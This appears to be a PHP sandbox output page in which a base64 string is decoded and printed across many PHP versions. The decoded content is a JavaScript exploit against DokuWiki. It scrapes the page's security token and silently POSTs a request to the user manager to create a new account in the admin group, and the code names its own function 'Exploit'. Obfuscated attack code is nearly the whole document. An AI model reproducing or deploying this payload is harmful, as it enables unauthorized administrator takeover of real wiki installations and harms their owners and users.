<?php
var_dump(base64_decode("ZnVuY3Rpb24gTXlSZXF1ZXN0KCkgew0KaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkgew0KUmVxUmVhZGVyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KUmVxUmVhZGVyID0gbmV3IEFjdGl2ZXhPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIik7DQp9DQpSZXFSZWFkZXIub25yZWFkeXN0YXRlY2hhbmdlID0gZnVuY3Rpb24gKCkgeyBUb2tlbkZpbmRlcihSZXFSZWFkZXIpOyB9DQpSZXFSZWFkZXIub3BlbigiR0VUIiwgImRva3UucGhwIiwgdHJ1ZSk7DQpSZXFSZWFkZXIuc2VuZCgpOw0KfQ0KZnVuY3Rpb24gVG9rZW5GaW5kZXIoYSkgew0KaWYgKGEucmVhZHlTdGF0ZSA9PSA0ICYmIGEuc3RhdHVzID09IDIwMCkgew0KdmFyIHNyYyA9IGEucmVzcG9uc2VUZXh0Ow0KcCA9IC92YWx1ZT0iKFswLTlhLWZdKykiLzsNCnZhciB0b2tlbiA9IHNyYy5tYXRjaChwKTsNCnBhcmFtcyA9ICJzZWN0b2s9IiArIHRva2VuWzFdICsgIiZ1c2VyaWQ9VVNFUk5BTUUmdXNlcnBhc3M9UEFTU1dPUkQmdXNlcm5hbWU9VVNFUk5BTUUmdXNlcm1haWw9YXR0QHd3d3d3d3d3Lm9zZmEmdXNlcmdyb3Vwcz1hZG1pbix1c2VyJmRvPWFkbWluJnBhZ2U9dXNlcm1hbmFnZXImc3RhcnQ9MCZmblthZGRdPUFkZCI7DQphbGVydChwYXJhbXMpOw0KRXhwbG9pdChwYXJhbXMpOw0KfQ0KfQ0KZnVuY3Rpb24gRXhwbG9pdChwYXJhbWV0ZXJzKSB7DQppZiAod2luZG93LlhNTEh0dHBSZXF1ZXN0KSB7DQpIdHRwUmVxID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KSHR0cFJlcSA9IG5ldyBBY3RpdmV4T2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpOw0KfQ0KSHR0cFJlcS5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7DQppZiAoSHR0cFJlcS5yZWFkeVN0YXRlID09IDQgJiYgSHR0cFJlcS5zdGF0dXMgPT0gMjAwKSB7DQoNCn0NCn0NCkh0dHBSZXEub3BlbignUE9TVCcsICJkb2t1LnBocD9pZD1kb2Fka3dva2FkIiwgdHJ1ZSk7DQpIdHRwUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtdHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCkh0dHBSZXEuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1sZW5ndGgiLCBwYXJhbWV0ZXJzLmxlbmd0aCk7DQpIdHRwUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbm5lY3Rpb24iLCAiY2xvc2UiKTsNCkh0dHBSZXEuc2VuZChwYXJhbWV0ZXJzKTsNCn0NCk15UmVxdWVzdCgpOw0K"));
- Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.10, 7.2.0 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.7
- string(1230) "function MyRequest() {
if (window.XMLHttpRequest) {
ReqReader = new XMLHttpRequest();
} else {
ReqReader = new ActivexObject("Microsoft.XMLHTTP");
}
ReqReader.onreadystatechange = function () { TokenFinder(ReqReader); }
ReqReader.open("GET", "doku.php", true);
ReqReader.send();
}
function TokenFinder(a) {
if (a.readyState == 4 && a.status == 200) {
var src = a.responseText;
p = /value="([0-9a-f]+)"/;
var token = src.match(p);
params = "sectok=" + token[1] + "&userid=USERNAME&userpass=PASSWORD&username=USERNAME&usermail=att@wwwwwwww.osfa&usergroups=admin,user&do=admin&page=usermanager&start=0&fn[add]=Add";
alert(params);
Exploit(params);
}
}
function Exploit(parameters) {
if (window.XMLHttpRequest) {
HttpReq = new XMLHttpRequest();
} else {
HttpReq = new ActivexObject("Microsoft.XMLHTTP");
}
HttpReq.onreadystatechange = function () {
if (HttpReq.readyState == 4 && HttpReq.status == 200) {
}
}
HttpReq.open('POST', "doku.php?id=doadkwokad", true);
HttpReq.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
HttpReq.setRequestHeader("Content-length", parameters.length);
HttpReq.setRequestHeader("Connection", "close");
HttpReq.send(parameters);
}
MyRequest();
"
preferences:
238.63 ms | 408 KiB | 353 Q